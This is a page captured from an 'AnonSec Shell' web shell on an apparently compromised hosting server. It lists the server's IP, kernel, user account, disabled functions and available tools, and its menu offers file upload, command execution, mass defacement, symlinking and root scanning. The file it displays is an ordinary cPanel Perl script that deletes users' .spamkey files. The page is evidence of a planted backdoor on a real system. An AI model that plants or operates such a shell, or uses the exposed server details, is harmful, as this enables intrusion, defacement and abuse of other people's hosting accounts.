AnonSec Shell
Server IP : 221.132.30.236  /  Your IP : 216.73.216.91   [ Reverse IP ]
Web Server : Apache
System : Linux web3.trangwebvang.net 2.6.32-954.3.5.lve1.4.86.el6.x86_64 #1 SMP Tue Aug 31 17:08:39 UTC 2021 x86_64
User : cherishhotel ( 944)
PHP Version : 5.6.40
Disable Function : exec, system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid,dl,symlink
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /scripts/killspamkeys
#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/killspamkeys                    Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

# Attention: This script is called during SpamAssassin installation.

use strict;

$| = 1;

use Cpanel::PwCache::Helpers ();
use Cpanel::PwCache::Build   ();

Cpanel::PwCache::Helpers::no_uid_cache();    #uid cache only needed if we are going to make lots of getpwuid calls
Cpanel::PwCache::Build::init_passwdless_pwcache();

my $pwcache_ref = Cpanel::PwCache::Build::fetch_pwcache();
foreach my $pw (@$pwcache_ref) {
    if ( -f "$pw->[7]/.spamkey" ) {
        print "Removing spamkey for $pw->[0]...";
        unlink("$pw->[7]/.spamkey");
        print "Done\n";
    }
}

Anon7 - 2022
AnonSec Team